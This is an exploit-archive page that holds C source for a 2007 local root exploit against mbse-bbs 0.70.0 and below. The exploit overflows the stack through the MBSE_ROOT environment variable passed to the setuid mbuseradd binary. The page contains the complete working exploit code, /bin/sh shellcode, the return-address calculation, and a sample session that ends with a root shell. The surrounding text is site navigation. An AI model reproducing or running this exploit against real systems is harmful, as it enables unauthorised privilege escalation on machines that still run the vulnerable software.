prdelka-vs-GNU-mbsebbs.c

prdelka-vs-GNU-mbsebbs.c: Posted Jan 20, 2007; Authored by prdelka | Site prdelka.blackart.org.uk; GNU/Linux mbse-bbs versions 0.70.0 and below local root exploit that makes use of a stack overflow.; tags | exploit, overflow, local, root; systems | linux; SHA-256 | b9b6c8e90f30995598ab9252882b6e7bfe68361174d80d1b09bb34e24378764c; Download | Favorite | View

prdelka-vs-GNU-mbsebbs.c

/* GNU/Linux mbse-bbs 0.70.0 & below stack overflow exploit
 * ========================================================
 * Multiple overflow conditions occur within mbse-bbs versions 0.70.0 & below.
 * The current version of mbse-bbs does not contain these weaknesses. 
 * Exploitation of these vulnerabilities can facilitate a privilege escalation
 * attack in which an unprivileged user becomes root. Exploit calculates
 * return address where ASLR is not in use. Vulnerable code is shown below;
 * 
 * matthew@localhost ~/foo/mbsebbs-0.70.0/unix $  cat -n mbuseradd.c 
 * ...
 * 177          shell   = calloc(PATH_MAX, sizeof(char));
 * ...
 * 228          sprintf(shell, "%s/bin/mbsebbs", getenv("MBSE_ROOT"));
 * 
 * (heap corruption in 0.33.17/stack overflow in others).
 * *** glibc detected *** free(): invalid next size (normal): 0x0804e068 ***
 *
 * Example Usage.
 *  matthew@localhost ~ $ id
 *  uid=1000(matthew) gid=100(users) groups=10(wheel),100(users)
 *  matthew@localhost ~ $ ./prdelka-vs-GNU-mbsebbs /opt/mbse/bin/mbuseradd
 *  [ GNU/Linux mbse-bbs 0.70.0 & below stack overflow exploit
 *  [ Using return address 0xbfffefd8
 *  sh-3.1# id
 *  uid=0(root) gid=1(bin) groups=10(wheel),100(users)
 * 
 * - prdelka
 */
#include <stdio.h>
#include <stdlib.h>

char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                 "\x31\xc0\x50\x68""//sh""\x68""/bin""\x89\xe3"
                 "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main(int argc,char* argv[]) {
        int i;
        long eip = 0x41414141;
  char envh[]="MBSE_ROOT=";
  printf("[ GNU/Linux mbse-bbs 0.70.0 & below stack overflow exploit\n");
        if(argc < 2) {
                printf("Error: [path]\n");
                exit(0);
        }
        char* buffer = malloc(strlen(envh) + 4062 + sizeof(eip));
  memset(buffer,0,strlen(envh) + 4062 + sizeof(eip));
  strcpy(buffer,envh);
        long ptr = (long)buffer;  
        for(i = 1;i <= 4061;i++){
                strncat(buffer,"A",1);
        }
        ptr = ptr + 4061;
        memcpy((char*)ptr,(char*)&eip,4);
        eip = 0xc0000000 -4 -strlen(argv[1]) -1 -strlen(buffer) -1 -strlen(shellcode) -1;
        memcpy((char*)ptr,(char*)&eip,4);
        char *env[] = {buffer,NULL};
        printf("[ Using return address 0x%x\n",eip);
        execle(argv[1],argv[1],"x","x","x",shellcode,NULL,env);
        exit(0);
}

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

prdelka-vs-GNU-mbsebbs.c

prdelka-vs-GNU-mbsebbs.c

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

prdelka-vs-GNU-mbsebbs.c

Share This

prdelka-vs-GNU-mbsebbs.c

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems